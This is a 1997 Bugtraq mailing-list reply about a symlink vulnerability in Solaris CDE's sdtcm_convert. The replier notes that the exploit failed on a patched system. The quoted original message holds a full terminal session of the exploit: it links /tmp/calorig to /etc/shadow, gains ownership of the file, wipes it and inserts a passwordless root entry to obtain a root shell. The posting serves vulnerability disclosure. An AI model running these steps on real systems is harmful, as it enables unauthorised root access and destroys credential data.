[4086] in bugtraq
Re: Security hole in Solaris 2.5 (sdtcm_convert) + exploit
daemon@ATHENA.MIT.EDU (Shumon Huque)
Sun Feb 23 16:38:27 1997
Date: Sun, 23 Feb 1997 15:40:43 -0500
Reply-To: Shumon Huque <shuque@SAS.UPENN.EDU>
From: Shumon Huque <shuque@SAS.UPENN.EDU>
X-To: adam@MATH.TAU.AC.IL
To: BUGTRAQ@netspace.org
In-Reply-To: <199702231045.MAA00882@lune.math.tau.ac.il> from "Adam Morrison"
at Feb 23, 97 12:45:40 pm
I don't know what exactly 103670-02 fixed but this exploit didn't work
on my machine - 2.5.1, CDE 1.0.2 with 103670-02 applied. The symlink
/tmp/calorig.user was removed and replaced by a plain file owned
by user.
>
> > Is this the bug fixed in the Sun patches:
> > 103670-02: CDE 1.0.2: sdtcm_convert has a security vulnerability
> > 103671-02: CDE 1.0.1: sdtcm_convert has a security vulnerability
> > 103717-02: CDE 1.0.2: sdtcm_convert has a security vulnerability (x86 version)
> > 103718-02: CDE 1.0.1: sdtcm_convert has a security vulnerability (x86 version)
> > or is it a new one?
>
> That's hard to know, since this patch is not publicly available off
> SunSolve (not right now, anyway).
>
> There's at least one other hole in sdtcm_convert which this patch may or not
> fix.
>
> CDE is generally a can of worms.
>
>
> $Id: sdtcm_convert,v 1.1 1996/07/14 17:44:54 adam Exp $
>
> Script started on Thu Jul 11 22:15:03 1996
> 22:15 [wumpus:~] % whoami
> adam
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -r-------- 1 root sys 291 Jul 11 22:14 /etc/shadow
> 22:15 [wumpus:~] % ln -s /etc/shadow /tmp/calorig.adam
> 22:15 [wumpus:~] % /usr/dt/bin/sdtcm_convert -d /tmp -v 3 adam
> Loading the calendar ...
>
> WARNING!! Data will be lost when converting version 4 data format
> back to version 3 data format.
>
> Do you want to continue? (Y/N) [Y] y
>
> Doing conversion ...
> Writing out new file ...
> Conversion done successfully.
> Total number of appointments = 0
> Number of one-time appointments converted = 0
> Number of repeating appointments converted = 0
> Number of one-time appointments pruned = 0
> Number of repeating appointments pruned = 0
> The original file is saved in /tmp/calorig.adam
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -r--rw---- 1 adam daemon 3114 Jul 11 22:15 /etc/shadow
> 22:15 [wumpus:~] % chmod 644 /etc/shadow
> 22:15 [wumpus:~] % cp /dev/null /etc/shadow
> cp: overwrite /etc/shadow (y/n)? y
> 22:15 [wumpus:~] % ls -l /etc/shadow
> -rw-r--r-- 1 adam daemon 0 Jul 11 22:15 /etc/shadow
> 22:15 [wumpus:~] % echo "root::6445::::::" >> /etc/shadow
> 22:16 [wumpus:~] % su
> # id
> uid=0(root) gid=1(other)
> # exit
>
> script done on Thu Jul 11 22:16:21 1996
>
>
>
> adam?
>
